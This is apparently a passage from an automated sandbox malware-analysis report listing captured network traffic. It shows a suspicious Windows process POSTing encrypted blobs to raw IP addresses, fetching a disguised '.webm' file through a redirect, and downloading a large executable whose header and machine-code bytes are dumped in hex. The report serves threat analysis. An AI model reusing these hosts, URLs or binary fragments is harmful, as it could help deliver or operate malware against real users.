                                                                                                                                            Data Raw: 88 58 03 26 10 27 00 00 80 00 00 00 80 64 46 4a a0 ef b0 5b 42 16 67 ec 89 14 7d 20 c7 43 ff 93 72 2a 75 9e f5 cd dd af 97 2f 46 21 c9 a4 a7 55 77 a2 29 02 0f 06 56 ba 7e 77 15 82 71 cf f4 b6 8e eb 24 1c 5d 43 e6 9c 0c 33 0e 87 25 d1 e3 f1 d4 d0 71 ed c8 52 54 a2 36 d0 d7 27 80 bd 1b ce 91 a8 c0 93 18 e8 ff ee 08 1c 57 af 7e 47 ca ea fd 5e dd 0f af 09 c7 36 e3 62 bb 82 c3 71 97 75 90 73 57 c5 7b ef b9 cc f0 a6 81 a1 a0 01 00 00 85 94 fb 93 84 79 42 03 da 7f ce bd 66 ea 6f cb 05 8c 3d 49 7f 58 34 88 32 f3 80 9a 7b 45 0d 23 5b aa 22 0a f2 b0 31 23 02 ae 49 f9 8d a2 67 6c 0d 79 8f 9d 4c 08 15 26 1a 42 e1 41 ad 0a f1 8f ba 7f c3 96 6d 7c 4a 99 38 55 f7 d3 c9 76 50 03 2c 52 e3 a5 f3 49 da 8d 9d d6 bc 7f d2 fe 0b 32 7b 3b 3c 2f 87 a4 7c 8e 06 95 ad 52 73 4d a1 28 0e 2e 0d 62 50 4e 86 1e 12 55 1d 26 55 13 13 29 47 98 4e f4 15 fb 8f d7 8b 14 2b e8 9e 7c 56 e8 57 2b 6b 2a 25 1e c0 fd 4e 8a 3e 41 73 15 77 fd 58 b1 c2 a0 ab 02 b9 54 5d 09 dd cb c8 51 c2 2f 64 b6 74 4f 83 0f 23 6c 5a 71 e9 45 a8 0a 4d f6 36 06 [TRUNCATED]
                                                                                                                                            Data Ascii: X&'dFJ[Bg} Cr*u/F!Uw)V~wq$]C3%qRT6'W~G^6bqusW{yBfo=IX42{E#["1#IglyL&BAm|J8UvP,RI2{;</|RsM(.bPNU&U)GN+|VW+k*%N>AswXT]Q/dtO#lZqEM6fBSe1=PK>ftMQ*f%q,Q<AsJ/Jd/z[_V5RLV"T;%|RF6yF}?^R?Q!2*60<F>+oKW9f'T]2OL{{FBoTMd9+]8\e5}Y?QI?[<l
                                                                                                                                            Nov 6, 2024 16:40:36.059514999 CET302INHTTP/1.1 200 OK
                                                                                                                                            Server: openresty/1.9.3.2
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:35 GMT
                                                                                                                                            Content-Type: text/plain
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Content-Length: 148
                                                                                                                                            Data Raw: 90 00 00 00 04 02 92 65 51 50 09 64 91 61 a9 f7 aa b0 c4 1d 05 8c 3d 49 7f 58 34 88 32 f3 80 9a 7b 45 0d 23 5b aa 22 0a f2 b0 31 23 02 ae 49 f9 8d a2 67 6c 54 85 c2 93 a9 47 9f 66 87 19 92 94 d3 c3 5d f6 10 04 7f a5 37 33 99 8f 8d bc f1 39 80 2e 06 96 0d 63 53 c9 42 69 ac 3f 0e af f9 10 28 81 2a 55 da 10 63 c5 af f9 83 4e 64 c5 88 82 dc a7 7a 99 9c df 89 b6 ee 1f a0 b1 75 fa 64 5c aa 41 97 b3 1f 16 d3 c4 3b 2f 37 75 b4 c9 4f 93 fa 05 04 06
                                                                                                                                            Data Ascii: eQPda=IX42{E#["1#IglTGf]739.cSBi?(*UcNdzud\A;/7uO


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            13192.168.2.1057318140.206.225.136805956C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Nov 6, 2024 16:40:34.811568022 CET334OUTPOST / HTTP/1.1
                                                                                                                                            Host: 140.206.225.136:80
                                                                                                                                            Content-type: application/octet-stream
                                                                                                                                            Content-Length: 204
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Data Raw: 3d 00 00 00 0b 00 00 00 c0 00 00 00 77 18 96 29 dc 59 a4 83 2d e1 e1 fa 33 61 69 df a1 7f 53 22 8a 4d e4 24 0e 3e f4 6d 4e 7e 27 0b cb f2 2d 75 66 e5 c2 61 50 43 4b ec 2b 33 a4 bf ef 0b 78 95 5a 97 0a c2 03 02 e5 ee e0 bb ae 5a d0 9b 97 4e 02 26 d8 f9 b1 17 6b a9 c3 b0 23 4e e1 f7 9f 0c 03 0c 53 06 57 60 1b 28 6e a1 f7 4e e1 f7 9f 0c 03 0c 53 06 57 60 1b 28 6e a1 f7 4e e1 f7 9f 0c 03 0c 53 06 57 60 1b 28 6e a1 f7 4e 9c 7a 57 49 a2 1b d1 10 93 92 a1 f4 b1 98 eb 24 e6 03 a7 0c 1a db 10 fc 76 33 ba 7b 26 0f da 33 80 be 53 53 ae 02 b5 46 d9 b2 8d b1 89 91 aa 55 38 8f 4d 22 11 68 c1 ca 57 f4 f1 d4 50 19 f5 05
                                                                                                                                            Data Ascii: =w)Y-3aiS"M$>mN~'-ufaPCK+3xZZN&k#NSW`(nNSW`(nNSW`(nNzWI$v3{&3SSFU8M"hWP
                                                                                                                                            Nov 6, 2024 16:40:36.492095947 CET98INHTTP/1.1 200 OK
                                                                                                                                            Content-Length: 44
                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                            Connection: Close
                                                                                                                                            Nov 6, 2024 16:40:36.709439039 CET44INData Raw: 3d 00 00 00 0b 00 00 00 20 00 00 00 2a cd 23 36 43 99 2f b3 e0 de 14 e1 d3 87 08 3b c7 7e 2e 92 f8 5a 81 3e 01 ed af 0c e7 1f 6e ac
                                                                                                                                            Data Ascii: = *#6C/;~.Z>n


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            14192.168.2.1057326116.132.219.22805956C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Nov 6, 2024 16:40:36.401091099 CET321OUTPOST / HTTP/1.1
                                                                                                                                            Host: 116.132.219.22:80
                                                                                                                                            Content-type: application/octet-stream
                                                                                                                                            Content-Length: 192
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Data Raw: 88 58 03 26 40 9c 00 00 80 00 00 00 61 cb b8 9a 46 46 6e d1 c4 7d da aa 15 c9 6e 46 19 8b 01 28 1b 43 00 c6 01 96 b1 93 80 f7 8a e3 b2 4e 53 88 4a 60 d0 c6 2f e9 83 72 26 65 f1 54 76 15 83 e3 9d 94 bf 14 55 15 c3 19 18 58 04 88 7d fc b1 c3 b1 93 28 66 b0 c9 69 f5 a9 6c 1a 3c ab e6 c2 8d e3 ab b6 d6 7d b7 d6 87 3a 7a 63 e6 f0 89 08 eb 2d ee 36 fa ca 24 ff fe 69 90 b8 85 ef 2d b7 1a 22 26 e6 ce d3 7a 78 b5 d5 de 4d 1e 30 00 00 00 b5 07 5f 07 48 74 c2 0f dc 24 0d 01 a7 1b 18 78 d0 d3 af 01 3d e5 19 70 26 1f a6 42 7e d7 bd 7a 34 ab ac 84 b5 bf 34 c6 50 fa 93 fc f8 62 2e 3e
                                                                                                                                            Data Ascii: X&@aFFn}nF(CNSJ`/r&eTvUX}(fil<}:zc-6$i-"&zxM0_Ht$x=p&B~z44Pb.>
                                                                                                                                            Nov 6, 2024 16:40:37.546892881 CET152INHTTP/1.1 200 OK
                                                                                                                                            Content-Length: 36
                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:37 GMT
                                                                                                                                            Data Raw: 20 00 00 00 70 2d 6f 39 2a 1c c9 3f b2 8b 47 5d f1 c2 32 57 d0 3c c5 43 59 3a 42 a5 32 c9 9d bb 72 d5 9b f6
                                                                                                                                            Data Ascii: p-o9*?G]2W<CY:B2r


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            15192.168.2.1057343140.206.225.136805956C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Nov 6, 2024 16:40:38.294295073 CET786OUTPOST / HTTP/1.1
                                                                                                                                            Host: 140.206.225.136:80
                                                                                                                                            Content-type: application/octet-stream
                                                                                                                                            Content-Length: 656
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Data Raw: 88 58 03 26 20 4e 00 00 80 00 00 00 6f 21 a8 60 85 32 73 1e 4a 11 cf 48 7d 59 02 3d dd e3 7c 95 ba 6e 51 c8 5e df b3 14 ac 79 b0 04 64 36 b1 1f 70 6b a8 a4 87 fa 0a bb ea 05 76 ac 6e 59 5a 74 3f ec aa fe 17 59 67 be c0 80 01 94 63 85 b2 41 1a f9 44 5b a4 f9 92 59 d7 0c 47 2a fd a0 0d 58 b2 33 fa 93 c9 b7 24 1c 87 62 dd 6e 30 fa 2e b8 46 95 d5 f1 f4 81 82 71 0e 53 27 a1 d1 0a 01 ff 28 59 45 7e 89 03 99 63 22 78 34 a3 00 02 00 00 29 5a 01 65 ae f9 88 77 85 ac 43 c6 1c ce dc 9a 54 53 b3 23 9b be 79 71 74 9f 74 e3 20 03 2a c2 e8 99 74 b6 e4 f8 be 20 c0 83 44 0f b6 8a c1 0d 37 4a 03 99 34 7f bd 6e 05 89 b0 d7 c0 86 03 b6 d3 eb c5 2f ea e0 e2 24 5d bf 44 92 a7 8c 49 2f 74 92 27 ba ad 5e 04 9e 52 75 29 9f b3 14 2a 67 2f 5c 5e e3 4b c2 e1 55 d0 8b d9 79 56 64 31 55 f7 38 7d 7f 5b 41 c9 05 28 29 18 3a d8 6a 84 1f 66 1e 9f d9 e9 12 88 dc f0 f3 9c 2f 50 07 0a f8 f3 7e 5c ab 45 a8 56 0f f4 76 1c 61 d0 cb f1 e0 29 8b 84 6f 00 30 84 63 31 f5 cf b7 8d 05 8c 9c 9f 74 f1 25 43 f4 86 fb b5 6b 1c c6 1d 82 5f 54 9a 7d [TRUNCATED]
                                                                                                                                            Data Ascii: X& No!`2sJH}Y=|nQ^yd6pkvnYZt?YgcAD[YG*X3$bn0.FqS'(YE~c"x4)ZewCTS#yqtt *t D7J4n/$]DI/t'^Ru)*g/\^KUyVd1U8}[A():jf/P~\EVva)o0c1t%Ck_T}G*7j=uCFL#]<gTlIR9]x^}o<f)Cy!fz6ezhx!<P2L^kWm#2kbDuFx=k{g^5,vGeXQHz#MENR@4e/X|cYIs>bss75Q3byb'/ fn%#_+*Xu&{8wBjR(NqywVdFk [x5
                                                                                                                                            Nov 6, 2024 16:40:39.252748013 CET98INHTTP/1.1 200 OK
                                                                                                                                            Content-Length: 36
                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                            Connection: Close
                                                                                                                                            Nov 6, 2024 16:40:39.466953993 CET36INData Raw: 20 00 00 00 4d db 9b 92 49 24 03 ef ec 0d 2e b0 1b 18 a0 ba 6a 0e 06 c5 53 7a 0c 4f 15 64 15 ac 5b 57 76 09
                                                                                                                                            Data Ascii: MI$.jSzOd[Wv


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            16192.168.2.1057355107.148.237.1807512C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Nov 6, 2024 16:40:41.403122902 CET185OUTGET /d/PanAlistPhoto/SLCoreAssets254_2.webm HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
                                                                                                                                            Host: skinx.x1.lolgezi.cc
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Nov 6, 2024 16:40:42.767534018 CET1236INHTTP/1.1 302 Found
                                                                                                                                            Server: openresty
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:42 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Content-Length: 1462
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0, no-cache, no-store, must-revalidate
                                                                                                                                            Location: https://bjbgp01.baidupcs.com/file/350f2ed90l674df0a13399cb294b0863?bkt=en-82d2bca2fdceac3fabfb1ed2452331aa4ea92c5a28680a39063f76c7d20de64ee244b6b41ae7090f&fid=1103614021113-16051585-129100381070572&time=1730907642&sign=FDTAXUbGERQlBHSKfWqi-DCb740ccc5511e5e8fedcff06b081203-r6WwRtBhYnf79bsQAZEomL42rw0%3D&to=75&size=5941360&sta_dx=5941360&sta_cs=317&sta_ft=webm&sta_ct=3&sta_mt=3&fm2=MH%2CYangquan%2CAnywhere%2C%2CNone%2Cany&ctime=1729728590&mtime=1729728590&dt3=24&resv0=-1&resv1=0&resv2=rlim&resv3=5&resv4=5941360&vuk=1103614021113&iv=0&vl=1&htype=&randtype=&tkbind_id=0&newver=1&newfm=1&secfm=1&flow_ver=3&pkey=en-3cf4596bf0ad06de52fd9a80914cd67c97711c5c404e764460b4925d0024dd1473b613b062ffe5bb&expires=8h&rt=pr&r=569376143&mlogid=7212657344168653326&vbdid=-&fin=SLCoreAssets254_2.webm&fn=SLCoreAssets254_2.webm&err_ver=1.0&rtype=1&clienttype=70&dp-logid=7212657344168653326&dp-callid=0.1.1&hps=1&tsl=0&csl=0&fsl=-1&csign=pnawazyXxvhDSfXVs1mpjf37Nwk%3D&so=0&ut=6&uter=4&serv=1&uc=3871693838&ti=3996
                                                                                                                                            Data Raw:
                                                                                                                                            Data Ascii:
                                                                                                                                            Nov 6, 2024 16:40:42.767554045 CET321INData Raw: 33 39 39 65 37 34 63 63 65 38 34 61 66 38 61 37 36 64 30 36 37 62 61 33 34 33 63 33 65 62 32 38 66 66 37 61 65 62 65 39 31 37 36 26 68 66 6c 61 67 3d 33 30 26 66 72 6f 6d 5f 74 79 70 65 3d 31 26 61 64 67 3d 6e 26 72 65 71 6c 61 62 65 6c 3d 31 36
                                                                                                                                            Data Ascii: 399e74cce84af8a76d067ba343c3eb28ff7aebe9176&hflag=30&from_type=1&adg=n&reqlabel=16051585_d_831b808e43ac56a7fd3c1706a38d91ab_-1_769817cf1ab77604e3ebedabfe8c530f&fpath=_pcs_.appdata%2Fyoua%2Fweb&by=themisReferrer-Policy: no-referrerX-Cache:
                                                                                                                                            Nov 6, 2024 16:40:42.767568111 CET1236INData Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 6a 62 67 70 30 31 2e 62 61 69 64 75 70 63 73 2e 63 6f 6d 2f 66 69 6c 65 2f 33 35 30 66 32 65 64 39 30 6c 36 37 34 64 66 30 61 31 33 33 39 39 63 62 32 39 34 62 30 38 36 33 3f 62 6b 74 3d 65 6e
                                                                                                                                            Data Ascii: <a href="https://bjbgp01.baidupcs.com/file/350f2ed90l674df0a13399cb294b0863?bkt=en-82d2bca2fdceac3fabfb1ed2452331aa4ea92c5a28680a39063f76c7d20de64ee244b6b41ae7090f&amp;fid=1103614021113-16051585-129100381070572&amp;time=1730907642&amp;sign=FDT
                                                                                                                                            Nov 6, 2024 16:40:42.767580032 CET212INData Raw: 61 37 36 64 30 36 37 62 61 33 34 33 63 33 65 62 32 38 66 66 37 61 65 62 65 39 31 37 36 26 61 6d 70 3b 68 66 6c 61 67 3d 33 30 26 61 6d 70 3b 66 72 6f 6d 5f 74 79 70 65 3d 31 26 61 6d 70 3b 61 64 67 3d 6e 26 61 6d 70 3b 72 65 71 6c 61 62 65 6c 3d
                                                                                                                                            Data Ascii: a76d067ba343c3eb28ff7aebe9176&amp;hflag=30&amp;from_type=1&amp;adg=n&amp;reqlabel=16051585_d_831b808e43ac56a7fd3c1706a38d91ab_-1_769817cf1ab77604e3ebedabfe8c530f&amp;fpath=_pcs_.appdata%2Fyoua%2Fweb&amp;by=themis
                                                                                                                                            Nov 6, 2024 16:40:42.771442890 CET14INData Raw: 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                            Data Ascii: ">Found</a>.


                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            0192.168.2.105731236.138.50.1314435956C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-11-06 15:40:36 UTC493OUTGET /storageWeb/servlet/downloadServlet?code=TTIxRDExcUFxWUsyZUE2ODQxN3dJdEF5Q0tv&un=D520D8ADC384964E306AF1AA3DEEAF44A0596F6CB5C8600FE560D3DA9892C32B&dom=D930&rate=0&txType=0 HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-CH
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Host: download6.mcloud.139.com
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Referer: https://download6.mcloud.139.com/storageWeb/servlet
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                                                                                                                            2024-11-06 15:40:37 UTC394INHTTP/1.1 200 OK
                                                                                                                                            Server: Tengine
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:36 GMT
                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                            Content-Length: 189752013
                                                                                                                                            Connection: close
                                                                                                                                            Content-Disposition: attachment;filename="%E8%B5%84%E6%BA%90%E4%BF%AE%E5%A4%8D%E5%8C%85_241019_1.exe"
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Last-Modified: Sun, 20 Oct 2024 05:14:57 GMT
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                            2024-11-06 15:40:37 UTC1006INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e4 3a 91 d3 a0 5b ff 80 a0 5b ff 80 a0 5b ff 80 14 c7 0e 80 ad 5b ff 80 14 c7 0c 80 32 5b ff 80 14 c7 0d 80 ba 5b ff 80 a0 5b ff 80 a2 5b ff 80 32 32 fb 81 a3 5b ff 80 f2 33 fb 81 b2 5b ff 80 f2 33 fc 81 b8 5b ff 80 f2 33 fa 81 8e 5b ff 80 32 32 fc 81 a1 5b ff 80 a9 23 7c 80 a4 5b ff 80 a9 23 6c 80 b1 5b ff 80 a0 5b fe 80 4f 5b ff 80 05 32 f6 81 78 5b ff 80 05 32 00 80 a1 5b ff
                                                                                                                                            Data Ascii: MZ@0!L!This program cannot be run in DOS mode.$:[[[[2[[[[22[3[3[3[22[#|[#l[[O[2x[2[
                                                                                                                                            2024-11-06 15:40:37 UTC1400INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 57 8b 7c 24 0c 8b 74 24 10 8b 4c 24 14 55 c1 e1 06 53 01 f1 83 e9 40 8b 07 51 8b 5f 04 8b 4f 08 8b 57 0c 89 cf 8b 2e 31 d7 21 df 8d 84 28 78 a4 6a d7 31 d7 8b 6e 04 01 f8 c1 c0 07 89 df 01 d8 31 cf 21 c7 8d 94 2a 56 b7 c7 e8 31 cf 8b 6e 08 01 fa c1 c2 0c 89 c7 01 c2 31 df 21 d7 8d 8c 29 db 70 20 24 31 df 8b 6e 0c 01 f9 c1 c1 11 89 d7 01 d1 31 c7 21 cf 8d 9c 2b ee ce bd c1 31 c7 8b 6e 10 01 fb c1 c3 16 89 cf 01 cb 31 d7 21 df 8d 84 28 af 0f 7c f5 31 d7 8b 6e 14 01 f8 c1 c0 07 89 df 01 d8 31 cf 21 c7 8d 94 2a 2a c6 87 47 31 cf 8b 6e 18 01 fa c1 c2 0c 89 c7 01 c2 31 df 21 d7 8d 8c 29 13 46 30 a8 31 df 8b 6e 1c 01 f9 c1 c1 11 89 d7 01 d1 31 c7 21 cf 8d 9c 2b 01 95 46 fd 31 c7 8b 6e 20 01 fb c1 c3 16 89
                                                                                                                                            Data Ascii: VW|$t$L$US@Q_OW.1!(xj1n1!*V1n1!)p $1n1!+1n1!(|1n1!**G1n1!)F01n1!+F1n
                                                                                                                                            2024-11-06 15:40:37 UTC1400INData Raw: 29 7d f4 ef ff 31 c7 8b 6e 04 01 f9 bf ff ff ff ff c1 c1 0f 31 c7 01 d1 09 cf 8d 9c 2b d1 5d 84 85 31 d7 8b 6e 20 01 fb bf ff ff ff ff c1 c3 15 31 d7 01 cb 09 df 8d 84 28 4f 7e a8 6f 31 cf 8b 6e 3c 01 f8 bf ff ff ff ff c1 c0 06 31 cf 01 d8 09 c7 8d 94 2a e0 e6 2c fe 31 df 8b 6e 18 01 fa bf ff ff ff ff c1 c2 0a 31 df 01 c2 09 d7 8d 8c 29 14 43 01 a3 31 c7 8b 6e 34 01 f9 bf ff ff ff ff c1 c1 0f 31 c7 01 d1 09 cf 8d 9c 2b a1 11 08 4e 31 d7 8b 6e 10 01 fb bf ff ff ff ff c1 c3 15 31 d7 01 cb 09 df 8d 84 28 82 7e 53 f7 31 cf 8b 6e 2c 01 f8 bf ff ff ff ff c1 c0 06 31 cf 01 d8 09 c7 8d 94 2a 35 f2 3a bd 31 df 8b 6e 08 01 fa bf ff ff ff ff c1 c2 0a 31 df 01 c2 09 d7 8d 8c 29 bb d2 d7 2a 31 c7 8b 6e 24 01 f9 bf ff ff ff ff c1 c1 0f 31 c7 01 d1 09 cf 8d 9c 2b 91 d3
                                                                                                                                            Data Ascii: )}1n1+]1n 1(O~o1n<1*,1n1)C1n41+N1n1(~S1n,1*5:1n1)*1n$1+
                                                                                                                                            2024-11-06 15:40:37 UTC1400INData Raw: 01 07 8d 7f 04 83 e9 01 0f 85 e4 ff ff ff 8b 44 24 18 5f 5e 5b 5d c3 90 90 90 90 90 90 90 90 90 90 90 55 53 56 57 b8 00 00 00 00 8d 15 a0 c6 46 00 0f ba 22 04 0f 83 6b 00 00 00 0f ba 22 13 0f 83 61 00 00 00 8b 7c 24 14 8b 4c 24 18 8b 6c 24 1c 0f 31 89 c6 bb 00 00 00 00 0f ae 3f f0 01 1f 0f 31 89 c2 29 f0 89 d6 89 c3 e9 03 00 00 00 90 90 90 0f ae 3f f0 01 07 83 ed 01 0f 84 1f 00 00 00 0f 31 89 c2 29 f0 89 d6 39 d8 89 c3 ba 00 00 00 00 0f 95 c2 29 d1 8d 3c 97 0f 85 d2 ff ff ff 8b 44 24 18 29 c8 5f 5e 5b 5d c3 90 90 90 90 90 90 90 57 53 31 c0 8b 7c 24 0c 8b 5c 24 10 83 fb 00 0f 84 5b 00 00 00 b9 08 00 00 00 0f c7 f2 0f 82 0d 00 00 00 e2 f5 e9 46 00 00 00 90 90 90 90 90 90 83 fb 04 0f 82 27 00 00 00 89 17 8d 7f 04 83 c0 04 83 eb 04 0f 84 26 00 00 00 b9 08 00
                                                                                                                                            Data Ascii: D$_^[]USVWF"k"a|$L$l$1?1)?1)9)<D$)_^[]WS1|$\$[F'&
                                                                                                                                            2024-11-06 15:40:37 UTC1400INData Raw: 00 00 83 66 10 00 33 c0 c7 46 14 07 00 00 00 66 89 06 5e c3 55 8b ec 8b 45 0c 57 8b f9 3b 47 14 77 2b 83 7f 14 08 53 56 8b df 72 02 8b 1f 8d 34 00 89 47 10 56 ff 75 08 53 e8 fc a0 03 00 83 c4 0c 33 c0 66 89 04 1e 8b c7 5e 5b eb 10 ff 75 08 c6 45 0c 00 ff 75 0c 50 e8 fc 00 00 00 5f 5d c2 08 00 55 8b ec 83 ec 10 53 56 8b f1 57 8b 7d 08 8b c7 6a 18 2b 06 99 59 f7 f9 89 75 fc 8b d8 8b 46 04 2b 06 99 f7 f9 3d aa aa aa 0a 0f 84 c1 00 00 00 40 8b ce 50 89 45 f0 e8 08 02 00 00 6b c8 18 83 ca ff 3d aa aa aa 0a 89 45 f4 0f 47 ca e8 19 01 00 00 ff 75 0c 6b cb 18 89 45 08 89 4d f8 03 c8 e8 55 02 00 00 8b 5e 04 8b 36 3b fb 75 19 8b 7d 08 eb 0e 56 8b cf e8 3f 02 00 00 83 c7 18 83 c6 18 3b f3 75 ee eb 4b 8b 45 08 89 45 0c 3b f7 74 20 56 8b c8 e8 21 02 00 00 8b 45 0c 83
                                                                                                                                            Data Ascii: f3Ff^UEW;Gw+SVr4GVuS3f^[uEuP_]USVW}j+YuF+=@PEk=EGukEMU^6;u}V?;uKEE;t V!E
                                                                                                                                            2024-11-06 15:40:37 UTC1258INData Raw: 3e 8d 04 09 50 ff 75 08 8d 04 57 50 e8 b1 9b 03 00 83 c4 0c 33 c0 66 89 04 5f 8b c6 5f 5b eb 13 51 ff 75 08 c6 45 0c 00 ff 75 0c 51 8b ce e8 d5 00 00 00 5e 5d c2 08 00 55 8b ec 53 8b 5d 08 56 57 8b 7d 10 03 ff 57 ff 75 0c 53 e8 f2 a0 03 00 8b 75 18 8d 04 36 50 ff 75 14 8d 04 1f 50 e8 df a0 03 00 8b 45 10 83 c4 18 03 c6 33 c9 5f 5e 66 89 0c 43 5b 5d c2 14 00 55 8b ec 51 51 8b 55 08 b8 fe ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 6c 8b 43 14 8d 3c 11 57 8b cb 89 45 08 e8 c6 fc ff ff 8b f0 8d 4e 01 51 e8 28 fd ff ff 8b 4d fc 89 7b 10 8b 7d 08 89 45 f8 89 73 14 8d 0c 4d 02 00 00 00 51 83 ff 08 72 1c 8b 33 56 50 e8 6b a0 03 00 83 c4 0c 8d 14 7d 02 00 00 00 8b ce e8 ab fb ff ff eb 0a 53 50 e8 51 a0 03 00 83 c4 0c 8b 45 f8 5f 89 03 8b c3 5e 5b c9
                                                                                                                                            Data Ascii: >PuWP3f__[QuEuQ^]US]VW}WuSu6PuPE3_^fC[]UQQUSVWK+M;rlC<WENQ(M{}EsMQr3VPk}SPQE_^[
                                                                                                                                            2024-11-06 15:40:37 UTC1400INData Raw: 7d f4 8d 4d e0 8b 02 0f 43 4d e0 6a 30 51 52 ff 50 14 85 c0 78 17 8b 95 58 ff ff ff 8b 8d 60 ff ff ff e8 f5 02 00 00 88 85 67 ff ff ff 8b 8d 5c ff ff ff 51 8b 11 ff 52 08 8b 8d 58 ff ff ff 51 8b 01 ff 50 08 89 9d 58 ff ff ff 38 9d 67 ff ff ff 74 70 b3 01 c6 85 5c ff ff ff 01 84 db 75 3b 8b b5 50 ff ff ff 80 3e 00 c6 85 5c ff ff ff 01 75 25 8b 85 54 ff ff ff 8d 55 e0 39 7d f4 6a 01 0f 43 55 e0 8b 08 52 50 ff 51 18 f7 d8 1a c0 fe c0 89 85 5c ff ff ff c6 46 01 01 8b 85 54 ff ff ff 50 8b 08 ff 51 08 8b 85 60 ff ff ff 50 8b 08 ff 51 08 8a 9d 5c ff ff ff 8d 4d b0 e8 c6 f4 ff ff eb 47 8b b5 50 ff ff ff 38 1e 75 99 39 7d f4 8d 45 e0 8d 8d 68 ff ff ff 0f 43 45 e0 50 e8 21 f4 ff ff 8d 8d 68 ff ff ff e8 ea 50 01 00 8d 8d 68 ff ff ff e8 8e f4 ff ff e9 68 ff ff ff 8b
                                                                                                                                            Data Ascii: }MCMj0QRPxX`g\QRXQPX8gtp\u;P>\u%TU9}jCURPQ\FTPQ`PQ\MGP8u9}EhCEP!hPhh
                                                                                                                                            2024-11-06 15:40:37 UTC1400INData Raw: 53 02 00 00 84 c0 74 36 8b 06 8d 8d ec fa ff ff 51 56 89 9d ec fa ff ff ff 50 38 8b 07 8d 8d e8 fa ff ff 51 57 89 9d e8 fa ff ff ff 50 38 8b 85 ec fa ff ff 3b 85 e8 fa ff ff 75 02 b3 01 8d 8d a0 fb ff ff e8 c6 ef ff ff 8d 8d 88 fb ff ff e8 bb ef ff ff 8d 8d 70 fb ff ff e8 b0 ef ff ff 8d 8d 58 fb ff ff e8 a5 ef ff ff 8d 8d 40 fb ff ff e8 9a ef ff ff 8d 8d 28 fb ff ff e8 8f ef ff ff 8d 8d d0 fb ff ff e8 84 ef ff ff 8d 8d b8 fb ff ff e8 79 ef ff ff 8d 8d 10 fb ff ff e8 6e ef ff ff 8d 8d f8 fa ff ff e8 63 ef ff ff 8b 4d fc 8a c3 5f 5e 33 cd 5b e8 ab 7e 03 00 c9 c3 55 8b ec 8b 55 0c 33 c0 56 8b 75 08 57 83 66 10 00 c7 46 14 07 00 00 00 66 89 06 8b 41 10 3b c2 72 26 8b 7d 10 2b c2 3b c7 0f 42 f8 83 79 14 08 72 02 8b 09 8d 0c 51 57 51 8b ce e8 3d ef ff ff 5f 8b
                                                                                                                                            Data Ascii: St6QVP8QWP8;upX@(yncM_^3[~UU3VuWfFfA;r&}+;ByrQWQ=_
